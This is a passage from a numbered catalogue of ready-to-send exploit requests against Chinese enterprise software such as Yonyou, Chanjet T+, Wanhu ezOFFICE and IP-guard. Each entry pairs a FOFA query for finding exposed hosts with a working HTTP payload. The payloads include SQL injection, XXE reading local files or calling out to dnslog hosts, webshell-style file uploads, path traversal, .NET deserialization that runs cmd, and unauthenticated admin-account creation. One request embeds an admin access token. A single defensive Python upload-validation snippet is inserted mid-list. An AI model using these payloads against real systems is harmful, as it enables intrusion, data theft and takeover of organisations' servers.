Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml


43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php


50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL to confirm the file was written:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers


56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed when lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, dir gives the directory it is written to, and fileType gives the file type (extension)
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

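The three parameters just described (newdocId, dir, fileType) are the client-controlled pieces of the write path, which is why a relative dir lands the file inside the web application. As an added example that is not the product's code and not part of the original article, here is how an upload handler can validate such parameters before writing anything; UPLOAD_ROOT, ALLOWED_EXT, NAME_RE and safe_destination are names assumed for this example, and the storage root is assumed to sit outside the web root.

```python
import re
from pathlib import Path

# Assumed storage root for this example; it lives outside the web root so nothing
# written here is ever served or executed by the application server.
UPLOAD_ROOT = Path("/var/app/uploads").resolve()
# Allowlist of extensions; server-executable types (.jsp, .aspx, .php) are never on it.
ALLOWED_EXT = {".docx", ".xlsx", ".pdf", ".png"}
# Base name: letters, digits, '_' and '-' only, so '..', '/', '\' and NUL cannot appear.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


class RejectedUpload(ValueError):
    """Raised when a client-supplied destination is refused."""


def safe_destination(newdoc_id: str, file_type: str, subdir: str = "") -> Path:
    """Return the path a file may be written to, or raise RejectedUpload.

    newdoc_id, file_type and subdir play the roles of newdocId, fileType and dir
    in the request above (assumed mapping for this example).
    """
    if not NAME_RE.fullmatch(newdoc_id):
        raise RejectedUpload(f"bad file name: {newdoc_id!r}")
    ext = file_type.lower()
    if ext not in ALLOWED_EXT:
        raise RejectedUpload(f"extension not allowed: {file_type!r}")
    # A leading separator would make pathlib discard UPLOAD_ROOT ("/a" / "/b" == "/b").
    candidate = (UPLOAD_ROOT / subdir.lstrip("/\\") / f"{newdoc_id}{ext}").resolve()
    # resolve() collapses '..' segments; the containment check is what stops traversal.
    if UPLOAD_ROOT not in candidate.parents:
        raise RejectedUpload(f"destination escapes upload root: {candidate}")
    return candidate


def check(newdoc_id: str, file_type: str, subdir: str = "") -> str:
    """Classify a request as 'ok' or 'rejected' (convenience wrapper for the cases below)."""
    try:
        safe_destination(newdoc_id, file_type, subdir)
        return "ok"
    except RejectedUpload:
        return "rejected"


if __name__ == "__main__":
    # Constructed cases mirroring the parameter values in the request above.
    print(check("apoxkq", ".jsp", "../platform/portal/layout/"))   # rejected: extension
    print(check("apoxkq", ".docx", "../platform/portal/layout/"))  # rejected: traversal
    print(check("apoxkq", ".docx", "2024/06"))                     # ok
    print(check("../x", ".pdf"))                                   # rejected: name
```

The order of the checks matters less than the fact that every one of the three inputs is constrained independently: the extension is matched against an allowlist rather than a blocklist, the base name cannot carry separators, and the final resolved path is checked for containment rather than trusting that dir "looks" relative.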
68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
